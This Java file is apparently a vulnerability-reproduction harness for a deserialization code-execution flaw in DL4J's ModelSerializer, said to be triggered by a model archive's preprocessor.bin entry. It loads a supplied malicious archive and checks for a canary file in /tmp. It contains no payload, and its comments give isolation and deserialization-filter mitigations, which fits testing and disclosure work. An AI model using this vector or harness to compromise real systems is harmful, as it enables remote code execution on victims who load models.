DL4J ModelSerializer deserialization RCE PoC (preprocessor.bin)
db9ffe9
import org.deeplearning4j.util.ModelSerializer;
import java.io.File;
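/**
 * Reproduction harness for the model-load side of the issue named in the page title:
 * it opens a model archive with the standard DL4J loader and then reports whether a
 * canary file appeared on disk.
 *
 * <p>Review notes (defensive):
 * <ul>
 *   <li>The only action performed here is the ordinary "load a model" call. If the canary
 *       appears, the archive caused code to run as a side effect of loading. Presumably this
 *       happens through Java-native deserialization of the archive's {@code preprocessor.bin}
 *       entry, as the page title states; the loader internals are not visible here.</li>
 *   <li>Run this only in a disposable, isolated environment. The archive is untrusted input
 *       by construction.</li>
 *   <li>Mitigation for real deployments: treat model archives as executable content. Load them
 *       only from trusted, integrity-checked sources, and constrain Java deserialization with
 *       a JVM-wide {@code ObjectInputFilter} (for example through the {@code jdk.serialFilter}
 *       system property) that allow-lists the expected classes.</li>
 * </ul>
 */
public class LoadPoc {
    /** Archive under test, resolved relative to the working directory. */
    private static final String MODEL_PATH = "malicious-model.zip";

    /** Marker file whose appearance signals that code ran during the load. */
    private static final String CANARY_PATH = "/tmp/DL4J_RCE_CANARY";

    /**
     * Loads the archive and prints whether the canary file exists afterwards.
     *
     * @param a unused command-line arguments
     * @throws Exception declared for interface compatibility; load failures are caught and reported
     */
    public static void main(String[] a) throws Exception {
        File model = new File(MODEL_PATH);
        File canary = new File(CANARY_PATH);

        // Without the archive the load fails before any parsing, and a missing canary would
        // then be misread as "not vulnerable".
        if (!model.isFile()) {
            System.out.println("[!] " + MODEL_PATH + " not found in the working directory; nothing was tested.");
            return;
        }

        // A canary left over from an earlier run would produce a false positive.
        boolean staleCanary = canary.exists();
        if (staleCanary) {
            System.out.println("[!] " + CANARY_PATH + " already exists before the load; remove it and re-run for a conclusive result.");
        }

        // The "victim" action: load a model file with the standard DL4J API.
        System.out.println("[*] loading malicious-model.zip via ModelSerializer.restoreMultiLayerNetwork ...");
        try {
            ModelSerializer.restoreMultiLayerNetwork(model);
        } catch (Throwable t) {
            // Deliberately broad: the loader is expected to fail after the deserialization step,
            // and the check below must still run.
            System.out.println("[*] (cast/parse error after deserialization is expected): " + t.getClass().getSimpleName());
        }

        if (staleCanary) {
            System.out.println("[*] result inconclusive: canary pre-dated this run.");
        } else if (canary.exists()) {
            System.out.println("[!] " + CANARY_PATH + " is present -> code ran during model load.");
        } else {
            System.out.println("[*] " + CANARY_PATH + " is absent -> no code execution observed during model load.");
        }
    }
}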